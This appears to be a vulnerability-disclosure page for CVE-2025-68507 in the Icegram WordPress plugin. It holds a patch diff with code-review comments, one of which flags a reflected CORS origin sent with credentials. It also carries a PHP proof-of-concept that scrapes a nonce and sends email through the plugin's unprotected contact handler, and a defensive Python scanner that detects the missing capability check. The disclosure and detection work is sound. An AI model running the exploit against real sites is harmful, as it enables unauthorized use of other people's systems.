 						jQuery.ajax({
 							method: 'POST',
 							type: 'text',
-							url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+							url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 							data: {
 								action: 'es_list_subscribe',
-								security: '<?php echo wp_create_nonce( 'ig-nonce' );?>',
+								security: '<?php echo esc_js( wp_create_nonce( 'ig-nonce' ) ); ?>',
 								name: name,
 								email: email,
 								list: list,
@@ -476,16 +510,16 @@
 		 * @param array $request_data
 		 */
 		public function es_list_subscribe() {
-
+
 			check_ajax_referer( 'ig-nonce', 'security' );
-
+
 			$response = array(
 				'status' => 'error',
 			);

-			$name  = ! empty( $_POST['name'] ) ? sanitize_text_field( $_POST['name'] ) : '';
-			$email = ! empty( $_POST['email'] ) ? sanitize_text_field( $_POST['email'] ) : '';
-			$list  = ! empty( $_POST['list'] ) ? sanitize_text_field( $_POST['list'] ) : '';
+			$name  = ! empty( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
+			$email = ! empty( $_POST['email'] ) ? sanitize_text_field( wp_unslash( $_POST['email'] ) ) : '';
+			$list  = ! empty( $_POST['list'] ) ? sanitize_text_field( wp_unslash( $_POST['list'] ) ) : '';

 			if ( ! empty( $list ) && is_email( $email ) ) {

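Review bot: the lines that change only trailing whitespace (the blank lines around `check_ajax_referer()`) are diff noise and should be left out. For `$email`, `sanitize_email()` is the closer fit than `sanitize_text_field()` before `is_email()`; the outcome is the same for valid addresses, but the intent is clearer and phpcs will not flag it.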
@@ -548,20 +582,20 @@
 				if ( stripos( get_current_screen()->base, 'settings' ) !== false ) {
 				?>
 	            <form name="icegram_housekeeping" action="#" method="POST" accept-charset="utf-8">
-	                <h2><?php _e( 'Housekeeping', 'icegram' ) ?></h2>
+	                <h2><?php esc_html_e( 'Housekeeping', 'icegram' ) ?></h2>
 	                <p class="ig_housekeeping">
 	                    <label for="icegram_remove_shortcodes">
 	                        <input type="checkbox" name="icegram_remove_shortcodes" value="yes"/>
-							<?php _e( 'Remove all Icegram Engage shortcodes', 'icegram' ); ?>
+							<?php esc_html_e( 'Remove all Icegram Engage shortcodes', 'icegram' ); ?>
 	                    </label>
 	                    <br/><br/>
 	                    <label for="icegram_remove_all_data">
 	                        <input type="checkbox" name="icegram_remove_all_data" value="yes"/>
-							<?php _e( 'Remove all Icegram Engage campaigns and messages', 'icegram' ); ?>
+							<?php esc_html_e( 'Remove all Icegram Engage campaigns and messages', 'icegram' ); ?>
 	                    </label>
 	                    <br/><br/>
-	                    <img alt="" src="<?php echo admin_url( 'images/wpspin_light.gif' ) ?>" class="ig_loader" style="vertical-align:middle;display:none"/>
-	                    <input type="submit" name="submit" id="submit" class="button button-primary" value="<?php _e( 'Clean Up', 'icegram' ); ?>">
+	                    <img alt="" src="<?php echo esc_url( admin_url( 'images/wpspin_light.gif' ) ); ?>" class="ig_loader" style="vertical-align:middle;display:none"/>
+	                    <input type="submit" name="submit" id="submit" class="button button-primary" value="<?php esc_html_e( 'Clean Up', 'icegram' ); ?>">
 	                <div id="icegram_housekeeping_response"></div>
 	                </p>
 	            </form>
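Review bot: `esc_html_e( 'Clean Up', 'icegram' )` sits inside the submit button's `value="..."` attribute; the attribute-context function `esc_attr_e()` is the correct choice there (both escape quotes, so nothing breaks, but the context-matched function is what reviewers and phpcs expect). The `<div id="icegram_housekeeping_response">` nested inside `<p class="ig_housekeeping">` is invalid HTML that browsers close early; pre-existing, but worth fixing while this block is being edited.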
@@ -570,22 +604,22 @@
 	        <script type="text/javascript">
 				jQuery(function () {
 					jQuery("form[name=icegram_housekeeping]").submit(function (e) {
-						if (confirm("<?php _e( 'You won't be able to recover this data once you proceed. Do you really want to perform this action?', 'icegram' ); ?>") == true) {
+						if (confirm("<?php echo esc_js( __( 'You won't be able to recover this data once you proceed. Do you really want to perform this action?', 'icegram' ) ); ?>") == true) {
 							e.preventDefault();
 							jQuery('.ig_loader').show();
 							jQuery('#icegram_housekeeping_response').text("");
 							params = jQuery("form[name=icegram_housekeeping]").serializeArray();
 							params.push({name: 'action', value: 'icegram_run_housekeeping'});
-							params.push({name: 'security', value: '<?php echo wp_create_nonce( 'ig_run_housekeeping' ); ?>'});
+							params.push({name: 'security', value: '<?php echo esc_js( wp_create_nonce( 'ig_run_housekeeping' ) ); ?>'});

 							jQuery.ajax({
 								method: 'POST',
 								type: 'text',
-								url: "<?php echo admin_url( 'admin-ajax.php' ); ?>",
+								url: "<?php echo esc_url( admin_url( 'admin-ajax.php' ) ); ?>",
 								data: params,
 								success: function (response) {
 									jQuery('.ig_loader').hide();
-									jQuery('#icegram_housekeeping_response').text("<?php _e( 'Done!', 'icegram' ); ?>");
+									jQuery('#icegram_housekeeping_response').text("<?php echo esc_js( __( 'Done!', 'icegram' ) ); ?>");
 								}
 							});
 						}
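Review bot: `esc_js()` is designed for inline attribute handlers and turns `"` into `&quot;`, which the browser does not decode inside a `<script>` block; the strings here survive because they contain only an apostrophe (which `esc_js()` backslash-escapes) and no double quotes, but a translation containing `"` would render the entity literally in the `confirm()` dialog. `wp_json_encode( __( '...', 'icegram' ) )`, which emits its own surrounding quotes, is the robust way to place PHP strings into script blocks.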
@@ -604,7 +638,10 @@
 			if ( current_user_can( 'manage_options' ) && ! empty( $params['icegram_remove_shortcodes'] ) && $params['icegram_remove_shortcodes'] == 'yes' ) {
 				// first get all posts with [icegram] shortcode in them
 				$sql   = "SELECT * FROM `$wpdb->posts` WHERE  `post_content` LIKE  '%[icegram %]%' and `post_type` != 'revision' ";
-				$posts = $wpdb->get_results( $sql, OBJECT );
+
+				// phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared
+				$posts = $wpdb->get_results( $sql, OBJECT );
+
 				if ( ! empty( $posts ) && is_array( $posts ) ) {
 					foreach ( $posts as $post ) {
 						$post_content = $post->post_content;
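Review bot: the three `phpcs:ignore` rules silence the direct-query and unprepared-SQL sniffs instead of addressing them; the query is safe because the `LIKE` pattern is a literal, but `$wpdb->prepare( "SELECT ID, post_content FROM {$wpdb->posts} WHERE post_content LIKE %s AND post_type != 'revision'", '%[icegram %]%' )` satisfies the sniff and documents the intent. Selecting `ID` and `post_content` rather than `*` also avoids loading every column of every matching post into memory.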
@@ -635,15 +672,20 @@
 		}

 		public function icegram_event_track() {
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
 			if ( ! empty( $_POST['ig_local_url_cs'] ) && isset( $_SERVER['HTTP_ORIGIN'] ) ) {
-				$parts    = parse_url( sanitize_text_field( $_POST['ig_local_url_cs'] ) );
+				// phpcs:ignore WordPress.Security.NonceVerification.Missing
+				$parts    = parse_url( sanitize_text_field( wp_unslash( $_POST['ig_local_url_cs'] ) ) );
 				$base_url = $parts["scheme"] . "://" . $parts["host"];
 				header( 'Access-Control-Allow-Origin: ' . $base_url );
 				header( 'Access-Control-Allow-Credentials: true' );
 			}

+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
 			if ( ! empty( $_POST['event_data'] ) ) {
-				foreach ( $_POST['event_data'] as $event ) {
+				// phpcs:ignore WordP
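Review bot: this hunk only adds `phpcs:ignore` annotations to `icegram_event_track()`, but the code they annotate deserves a change rather than a suppression: `Access-Control-Allow-Origin` is built from the request body value `ig_local_url_cs` and paired with `Access-Control-Allow-Credentials: true`, so the endpoint reflects whatever origin the caller supplies. Set the header only when the parsed host matches `wp_parse_url( home_url(), PHP_URL_HOST )` (or a configured allow-list), and guard `$parts['scheme']` and `$parts['host']` with `isset()`, since `parse_url()` can return an array without them. The handler is registered under `wp_ajax_nopriv_icegram_event_track`, so no nonce is available to unauthenticated callers; that is presumably why the nonce sniff is ignored, and the reasoning belongs in the comment.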

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68507 - Icegram <= 3.1.35 - Missing Authorization

/**
 * Proof of Concept for CVE-2025-68507
 * Exploits missing authorization in Icegram plugin contact form
 * Requires obtaining a valid nonce first from the about page
 */

$target_url = 'http://vulnerable-wordpress-site.com';

// Step 1: Extract nonce from the Icegram about page
function get_nonce_from_about_page($base_url) {
    $about_url = $base_url . '/wp-admin/admin.php?page=icegram-about';
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $about_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    $response = curl_exec($ch);
    curl_close($ch);
    
    // Extract nonce from the contact form
    if (preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $response, $matches)) {
        return $matches[1];
    }
    
    return null;
}

// Step 2: Exploit the missing authorization to send email
function exploit_contact_form($base_url, $nonce) {
    $post_url = $base_url . '/wp-admin/admin.php?page=icegram-about';
    
    $post_data = [
        'submit_query' => 'Send',
        'client_name' => 'Atomic Edge Test',
        'client_email' => 'attacker@example.com',
        'subject' => 'Test Exploit - CVE-2025-68507',
        'message' => 'This email was sent via unauthorized access to Icegram plugin.',
        '_wpnonce' => $nonce,
        'additional_info[current_plugin]' => 'Icegram 3.1.35'
    ];
    
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $post_url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
    
    // Add headers to mimic legitimate request
    $headers = [
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    ];
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    return ['code' => $http_code, 'response' => $response];
}

// Execute the exploit
$nonce = get_nonce_from_about_page($target_url);

if ($nonce) {
    echo "[+] Obtained nonce: $nonce\n";
    echo "[+] Attempting to exploit contact form...\n";
    
    $result = exploit_contact_form($target_url, $nonce);
    
    if ($result['code'] == 200 || $result['code'] == 302) {
        echo "[+] Exploit successful! Email sent via unauthorized access.\n";
        echo "[+] HTTP Status: " . $result['code'] . "\n";
    } else {
        echo "[-] Exploit failed. HTTP Status: " . $result['code'] . "\n";
    }
} else {
    echo "[-] Failed to obtain nonce from about page\n";
}

?>
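The PoC above only needs a nonce because the handler it posts to stops at the nonce check; the defect is the absence of a capability check between the `submit_query` trigger and the `wp_mail()` call. As an added example (not Atomic Edge's PoC and not the plugin's code), the Python triage script below scans a plugin source file for that handler shape and reports whether a `current_user_can()` call sits in that window, ignoring anything inside comments. The two PHP fragments it runs on are constructed to show the unpatched and patched shapes and are not the plugin's actual source; the nonce action name and the `manage_options` capability in them are assumptions.

```python
"""Triage check for the CWE-862 pattern behind CVE-2025-68507: a WordPress
POST handler that verifies a nonce but never checks a capability before
calling wp_mail(). Added example; the PHP fragments below are constructed
to illustrate the two shapes and are not the plugin's own source."""
import re
import sys
from dataclasses import dataclass
from typing import Optional

HANDLER_TRIGGER = re.compile(r"isset\(\s*\$_POST\[\s*['\"]submit_query['\"]\s*\]\s*\)")
NONCE_CHECK = re.compile(r"\b(?:check_admin_referer|wp_verify_nonce)\s*\(")
CAPABILITY_CHECK = re.compile(r"\bcurrent_user_can\s*\(")
MAIL_CALL = re.compile(r"\bwp_mail\s*\(")


@dataclass
class Finding:
    handler_line: int           # 1-based line of the isset($_POST['submit_query']) trigger
    mail_line: int              # 1-based line of the first wp_mail() after it
    has_nonce_check: bool       # CSRF protection present (not the same as authorization)
    has_capability_check: bool  # current_user_can() present between trigger and wp_mail()

    @property
    def missing_authorization(self) -> bool:
        return not self.has_capability_check


def strip_php_comments(src: str) -> str:
    """Remove /* */ and // comments so a commented-out check does not count.
    Block comments are replaced by the same number of newlines to keep line
    numbers stable. Strings containing '//' are not special-cased."""
    src = re.sub(r"/\*.*?\*/", lambda m: "\n" * m.group(0).count("\n"), src, flags=re.S)
    return re.sub(r"(?m)//.*$", "", src)


def audit_handler(php_source: str) -> Optional[Finding]:
    """Locate the submit_query handler and inspect the code between its
    trigger and the first wp_mail() call for nonce and capability checks."""
    lines = strip_php_comments(php_source).splitlines()
    start = next((i for i, line in enumerate(lines) if HANDLER_TRIGGER.search(line)), None)
    if start is None:
        return None
    mail = next((i for i in range(start, len(lines)) if MAIL_CALL.search(lines[i])), None)
    if mail is None:
        return None
    window = "\n".join(lines[start:mail + 1])
    return Finding(
        handler_line=start + 1,
        mail_line=mail + 1,
        has_nonce_check=bool(NONCE_CHECK.search(window)),
        has_capability_check=bool(CAPABILITY_CHECK.search(window)),
    )


def report(name: str, finding: Optional[Finding]) -> str:
    """One-line human-readable verdict for a scanned file."""
    if finding is None:
        return f"{name}: no submit_query -> wp_mail() handler found"
    verdict = "MISSING AUTHORIZATION" if finding.missing_authorization else "ok"
    return (f"{name}: handler at line {finding.handler_line}, wp_mail() at line "
            f"{finding.mail_line}, nonce={finding.has_nonce_check}, "
            f"capability={finding.has_capability_check} -> {verdict}")


# Constructed fragment in the shape of the unpatched handler (not the real file).
VULNERABLE_STYLE = """<?php
if ( isset( $_POST['submit_query'] ) ) {
    check_admin_referer( 'icegram-submit-query' );
    $subject = sanitize_text_field( wp_unslash( $_POST['subject'] ) );
    $message = sanitize_textarea_field( wp_unslash( $_POST['message'] ) );
    // no current_user_can() call guards the send below
    wp_mail( 'support@example.invalid', $subject, $message );
}
"""

# Constructed fragment in the shape of the fixed handler (not the real file).
PATCHED_STYLE = """<?php
if ( isset( $_POST['submit_query'] ) ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to do this.', 'icegram' ) );
    }
    check_admin_referer( 'icegram-submit-query' );
    $subject = sanitize_text_field( wp_unslash( $_POST['subject'] ) );
    $message = sanitize_textarea_field( wp_unslash( $_POST['message'] ) );
    wp_mail( 'support@example.invalid', $subject, $message );
}
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit real files given on the command line
        for path in sys.argv[1:]:
            with open(path, encoding="utf-8", errors="replace") as fh:
                print(report(path, audit_handler(fh.read())))
    else:  # demo on the constructed fragments
        print(report("vulnerable-style", audit_handler(VULNERABLE_STYLE)))
        print(report("patched-style", audit_handler(PATCHED_STYLE)))
```

Run it with no arguments to see both constructed fragments classified, or pass the plugin's `about-icegram.php` path to audit an installed copy. The script deliberately separates the nonce result from the capability result: a nonce proves the form was rendered for this browser session, and on its own it says nothing about who is allowed to use the handler, which is exactly the distinction the 3.1.36 fix addresses.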
